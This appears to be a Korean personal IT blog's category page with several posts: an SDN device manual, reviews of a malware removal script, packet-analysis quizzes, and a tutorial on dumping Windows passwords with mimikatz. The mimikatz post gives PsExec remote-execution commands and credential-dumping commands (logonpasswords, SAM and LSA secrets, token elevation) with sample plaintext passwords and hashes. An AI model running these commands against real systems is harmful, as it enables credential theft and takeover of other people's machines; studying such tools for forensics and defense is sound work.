'* IT'에 해당되는 글 91건

ZodiacWX를 이용한 SDN 연구와 Northbound Network 메뉴얼

* IT/Network













ZodiacWX를 이용한 SDN 연구와 Northbound Network 메뉴얼



ZodiacWX_Northbound Networks manual 


Recently, IoT와 클라우드가 연결되는 복잡한 네트워크에서 조금 더 간편하고 효율적인 SDN 이 부각되고 있습니다. 따라서 우리는 SDN 장치에 대해 연구하며 셋팅 및 필요사항을 제공하고자 합니다. 또한 ZodiacWX는 새로운 기술로 메뉴얼이 많이 나오지 않았기에 저의 ppt는 의미가 있다고 생각합니다. 















Name
Password
Homepage
Secret

악성코드 백신 프로그램(Malware Zero Kit(MZK), 바이러스 제로 시즌 2) 리뷰/ 후기

* IT/툴 (Tool)













악성코드 백신 프로그램(Malware Zero Kit(MZK), 바이러스 제로 시즌 2) 리뷰/ 후기





저자는 지금까지 사용해본 백신 프로그램 중 이 프로그램이 최고라고 생각한다. 다른 모든 바이러스 및 애드워어, 인터넷 팝업창 문제 등 모든 것을 다 해결해주는 제품이다. 


나무 위키에 따르면 매니저 ViOLeT이 직접 제작한 보조 악성코드 제거 스크립트인 'Malware Zero Kit'(mzk)을 무료로 배포한다. 이 강력한 스크립트를 사용하면 광고창을 띄우는 애드웨어, 악성코드 등의 유해 가능 프로그램을 검사 및 치료할 수 있다. 백신이나 여타 멀웨어 제거 프로그램으로 효과를 보지 못했다면 좀비pc등 각종바이러스를 제거해주므로 한 번 써보기를 권한다.


라고 표현이 되어 있다. 그만큼 이 제품은 사용효과도 좋고 문제있는 모든 프로그램을 검사하여 따로 격리해서 둔다.

만약 문제가 발생했을 시에 그 격리된 파일에 들어가서 다른 이름으로 변경 및 자신이 원하든 방법으로 수정하여 다시 배치 시킬수도 있다.

저의 경우 사이트에 자주 뜨는 about:blank 문제라던가, 팝업광고 문제에 해결을 많이 받았으며 어디에도 무료배포를 하면서 이와 같이 깔끔하게 정리할 수 있는 프로그램도 없다고 생각합니다. 



사이트 주소 = http://cafe.naver.com/malzero/94376



바이러스 제로 시즌 2에서는 다양한 보안 동향, 보안업체 소식과 각종 보안관련 문제를 공유한다. 다음은 주요 게시판에 대한 설명이다.


악성코드 정보 및 분석 : 최근 알려진 악성코드 기본 정보 및 유포/분석 정보를 공유한다.


보안 취약점/패치 : 여러 유형의 유용한 보안 취약점 정보를 제공한다.


보안 업계 소식 : 각 보안 업계의 소식을 올리고 공유한다.


악성코드 Q&A : 악성코드 및 바이러스 등에 대한 질문과 답변을 자유롭게 올릴 수 있다.


공식 배포하고 있는 사이트가 있다. 



예전부터 이 카페를 많이 이용하였고 오래 전 부터 보안업계에 발을 들이면서 관심있게 지켜본 카페이다. 여러가지로 우리에게 도움을 많이 주려고 노력하시는 분들로 인해 깨끗하고 안전한 컴퓨터 사용이 되지 않나 싶다. 

많은 노력을 통해 만든 바이러스 제로 시즌2 여러분에게 칭찬하고 싶습니다!
 



Name
Password
Homepage
Secret

네트워크 패킷 분석 Quiz 02

* IT/Network












네트워크 패킷 분석 Quiz 02



본 캡처 파일은 "제로 데이"공격을 경험 네트워크에서 가져온 Packet Dump 파일이다. 

네트워크 관리자는 당신에게 분석 요청했다.관리자는 141.157.228.12이 서버 이고, 10.1.1.31있는 클라이언트 시스템이다.


1. 어떤 응용 프로그램을 이용하여 파일을 전송 하였는가?

2. 파일을 수신하는 호스트의 IP 주소는 무엇인가?

3. 전송되는 파일의 이름은 무엇입니까?






Quiz 02 txt와 pcap 파일


quiz02.pcapng

quiz02문제.txt







Name
Password
Homepage
Secret

mimikatz 를 이용한 윈도우 비밀번호 해킹

* IT/Digital forensic












mimikatz 를 이용한 윈도우 비밀번호 해킹을 설명하겠습니다.





다운로드 : https://github.com/gentilkiwi/mimikatz/releases



가끔 바이러스로 판단을 합니다. 아무래도 해킹툴이다보니 당연하다고 생각하고 조심히 사용하시기 바랍니다.





mimikatz 를 실행할때는 cmd.exe를 "관리자 권한"으로 실행





c:\PsExec.exe \\192.168.0.20 -c C:\Users\user\Desktop\mimikatz_trunk\Win32\mimikatz.exe


C:\Users\user\Desktop\mimikatz_trunk\Win32\mimikatz.exe /accepteula \\192.168.0.20 cmd.exe




PsExec.exe를 설치후에 시도를 해보았으나 정확한 원격이 걸리는지 확인은 안되었으며,

아직까지 성공적인 결과는 아직 얻지 못했습니다.



명령어들 모음과 예시들이며 다양한 공격을 시도 할 수 있습니다.



debug 모드 변경

mimikatz# privilege::debug

privilege '20' OK




윈도우 비밀번호 평문으로 출력이 됩니다.

mimikatz# sekurlsa::logonpasswords

Authentication Id : 0 ; xxxxx (00000000:00xxxxx1)

Session : Interactive from 1

User Name : Administrator,user

Domain : EXADATA,win7x86

SID : S-1-5-21-xx

msv:

 [00000003] Primary

 * Username : Administrator

 * Domain : EXADATA

 * NTLM : ea620aaaaaab08aaaaabbdsfaaaaaax

 * SHA1 : ee199ebc98caaaaaadfsfaaaaaa

 tspkg :

 * Username : Administrator

 * Domain : EXADATA

 * Password : P@ssw0rd

 wdigest :

 * Username : Administrator

 * Domain : EXADATA

 * Password : P@ssw0rd

 kerberos :

 * Username : Administrator

 * Domain : EXADATA

 * Password : P@ssw0rd


윈도우 vault 값 리스트

mimikatz# vault::list

 Name : Administrator's Vault

 Path :

C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-

B380-DD4A704DDB28

 Items (0)

Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}

 Name : Windows Vault

 Path : C:\Users\Administrator\AppData\Local\Microsoft\Vault

 Items (0)


윈도우 token 

mimikatz # token::elevate

Token Id : 0

User name :

SID name : NT AUTHORITY\SYSTEM

448 21440 NT AUTHORITY\SYSTEM S-1-5-18 (04g,30p)

Primary

-> Impersonated !

* Process Token : 10211176 EXADATA\Administrator S-1-5-21-

3350660802-243114697-3461100895-500 (16g,23p) Primary

* Thread Token : 17350275 NT AUTHORITY\SYSTEM S-1-5-18

(04g,30p) Impersonation (Delegation)



mimikatz # lsadump::sam

Domain : EXADATA

SysKey : d7e3d100sdf90sd890f8sd0f80

SAMKey : 1cb0d9808f09ds8f908s09fd098

RID : 000001f4 (500)

User : Administrator

LM :

NTLM : ea62sdf0sd908089s0d8f908ghj789



mimikatz # lsadump::secrets

Domain : EXADATA

SysKey : d7e3d1c13341ea4a000c97f8dbc7a11b

Policy subsystem is : 1.11

LSA Key(s) : 1, default {86648e9a-dcad-6300-0675-edd6e1f91b3d}

 [00] {86648e9a-dcad-sf809s8f0s3d}

3d198bd4e0501dcf8427e1ffsf980809sfa

Secret : DefaultPassword

old/text: P@ssw0rd






mimikatz.pdf


mimikatz 사용법과 메타익스플로잇에 관한 연계된 설명이므로 많은 도움이 될 것 같습니다.

악용을 하지 마시고 좋은 부분으로 사용하여주셨으면 좋겠습니다.




Name
Password
Homepage
Secret

malware zero kit(보조 악성코드 제거 스크립트, d21r6c26qxshan.cloudfront.net에러)

* IT/툴 (Tool)













악성스크립트



chrome 또는 iexplore.exe 에서 문제가 계속적으로 발생했고,

d21r6c26qxshan.cloudfront.net 에러가 자주 뜨고 악성코드에 유사한 것 같아 에러를 해결하기위해 

검색과 정리가 필요해서 자료를 올려봅니다.





https://d21r6c26qxshan.cloudfront.net/mag/brastub6ab_amobl_inst.exe?Expires=1480332472&Signature=h6fbtkapKiHJQ5BmXKkUwH1nNUC53JnGUEtFQ2S4yd8uGluEDyGgdg3YhD-LcUb~vRFZN8M5N3GLgU0Djn00z1woJ9Dqxuw33KuXm8LqdCCh0ywiBsB6jRMwqjGlWX02WZs29KeMhY9vwZF81YPKncvSOCiWJ528NcbLjGNMl893ylOs~4amYFD8TIwxWVbreCrlovXutMxAGGSydRB3wRcYqzegWLAwQjdapUdToxHZPKOvcwhmZ5Xpssof0KmdzvnR62ElMXya1uYCa3zHpzw~C7Q__&Key-Pair-Id=APKAISRTKOQBSE4MKBKA




위와 같이 오류가 뜨는 경우가 있다. 이것을 해결하기 위해 해결방법과 정보 공유를 위해 글을 작성합니다.







악성코드 해결방법 링크



mobile : http://m.cafe.naver.com/malzero/94376

PC : http://cafe.naver.com/malzero/94376


해당 악성 프로그램은 아래의 보조 악성코드 제거 도구로 제거가 가능하며, 제거 수행은 표준 환경 또는 안전 모드 환경으로 부팅하신 후 진행해주시면 되겠습니다. (안전 모드 환경은 권장사항이며 필수는 아니다)



실행하게되면 검은색화면이 뜨는게 되고, 10~20분뒤에 제거가 되었다면서 악성코드 오류가 해결된다.

익스플로러,chrome 버튼(바로가기)이 삭제 되기 때문에 chrome 설치파일을 미리 받아두거나 C:\Program Files\Internet Explorer 폴더를 찾아 실행하면 되겠습니다.






Name
Password
Homepage
Secret

2015_dump 네트워크 패킷분석

* IT/Network












 


 

 


 

 

wireshark를 이용한 네트워크 패킷분석 파일과 보고서입니다.

 

 2015_dump 문제 텍스트 파일입니다.

 


 

2015_dump.txt


 


 

 

 

 

 

2015_dump 네트워크 패킷 분석 자료입니다.

 


 

 

 

2015_dump 프로젝트.pdf

2015_dump.pcap


 

 


 

 

 

Name
Password
Homepage
Secret